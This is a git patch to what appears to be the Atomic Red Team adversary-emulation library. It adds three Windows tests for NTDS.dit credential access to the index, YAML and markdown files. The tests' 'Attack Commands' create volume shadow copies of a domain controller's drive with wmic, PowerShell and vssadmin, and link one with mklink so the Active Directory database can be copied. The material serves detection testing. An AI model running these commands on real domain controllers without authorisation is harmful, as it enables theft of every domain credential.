From f7efbc9d6a8ad01b63e687a32bf91086d299cd01 Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Tue, 30 Jun 2020 16:34:07 +0200 Subject: [PATCH] new atomics (#1098) Co-authored-by: Patrick Bareiss --- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/windows-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 3 + .../Indexes/Indexes-Markdown/windows-index.md | 3 + atomics/Indexes/index.yaml | 79 +++++++++++- atomics/T1003.003/T1003.003.md | 115 +++++++++++++++++- atomics/T1003.003/T1003.003.yaml | 71 ++++++++++- 7 files changed, 269 insertions(+), 8 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index cebadf37..e4f467af 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -176,6 +176,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt +credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt +credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell +credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 73cc639d..5d64bb8f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -408,6 +408,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt +credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt +credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell +credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt credential-access,T1040,Network Sniffing,4,Packet Capture PowerShell,2bf62970-013a-4c74-b0a8-64030874e89a,powershell credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f844b414..7a372883 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -390,6 +390,9 @@ - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows] - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows] - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] + - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows] + - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - Atomic Test #2: Packet Capture macOS [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6c42e8a4..233977fd 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -845,6 +845,9 @@ - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows] - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows] - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] + - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows] + - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Packet Capture PowerShell [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2b744d57..3e0b7db6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -18176,12 +18176,14 @@ credential-access: elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - description: "This test is intended to be run on a domain Controller.\n\nThe - Active Directory database NTDS.dit may be dumped by copying it from a Volume - Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume - Shadow Copy with NTDS.dit\".\nA successful test also requires the export of - the SYSTEM Registry hive. \nThis test must be executed on a Windows Domain - Controller.\n" + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + + This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". + A successful test also requires the export of the SYSTEM Registry hive. + This test must be executed on a Windows Domain Controller. supported_platforms: - windows input_arguments: @@ -18249,6 +18251,71 @@ credential-access: ' name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with WMI + auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + dependencies: + - description: Target must be a Domain Controller + prereq_command: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v + ProductType | findstr LanmanNT + get_prereq_command: echo Sorry, Promoting this machine to a Domain Controller + must be done manually + executor: + command: 'wmic shadowcopy call create Volume=#{drive_letter} + +' + name: command_prompt + elevation_required: true + - name: Create Volume Shadow Copy with Powershell + auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + executor: + command: "(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')\n" + name: powershell + elevation_required: true + - name: Create Symlink to Volume Shadow Copy + auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + symlink_path: + description: symlink path + type: String + default: C:\Temp\vssstore + executor: + command: | + vssadmin.exe create shadow /for=#{drive_letter} + mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 + name: command_prompt + elevation_required: true T1040: technique: id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 5fe7fcc8..b46716a0 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th - [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil) +- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi) + +- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell) + +- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy) +
@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". -A successful test also requires the export of the SYSTEM Registry hive. +A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. **Supported Platforms:** Windows @@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually +
+
+ +## Atomic Test #4 - Create Volume Shadow Copy with WMI +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +wmic shadowcopy call create Volume=#{drive_letter} +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Target must be a Domain Controller +##### Check Prereq Commands: +```cmd +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +``` +##### Get Prereq Commands: +```cmd +echo Sorry, Promoting this machine to a Domain Controller must be done manually +``` + + + + +
+
+ +## Atomic Test #5 - Create Volume Shadow Copy with Powershell +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible') +``` + + + + + + +
+
+ +## Atomic Test #6 - Create Symlink to Volume Shadow Copy +This test is intended to be run on a domain Controller. + +The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| +| symlink_path | symlink path | String | C:\Temp\vssstore| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +vssadmin.exe create shadow /for=#{drive_letter} +mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 +``` + + + + + +
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 9718e758..6d7938e1 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -35,7 +35,7 @@ atomic_tests: The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". - A successful test also requires the export of the SYSTEM Registry hive. + A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. supported_platforms: - windows @@ -111,3 +111,72 @@ atomic_tests: rmdir /q /s #{output_folder} name: command_prompt elevation_required: true + +- name: Create Volume Shadow Copy with WMI + auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + dependencies: + - description: | + Target must be a Domain Controller + prereq_command: | + reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT + get_prereq_command: | + echo Sorry, Promoting this machine to a Domain Controller must be done manually + executor: + command: | + wmic shadowcopy call create Volume=#{drive_letter} + name: command_prompt + elevation_required: true + +- name: Create Volume Shadow Copy with Powershell + auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + executor: + command: | + (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible') + name: powershell + elevation_required: true + +- name: Create Symlink to Volume Shadow Copy + auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + description: | + This test is intended to be run on a domain Controller. + + The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + symlink_path: + description: symlink path + type: String + default: 'C:\Temp\vssstore' + executor: + command: | + vssadmin.exe create shadow /for=#{drive_letter} + mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 + name: command_prompt + elevation_required: true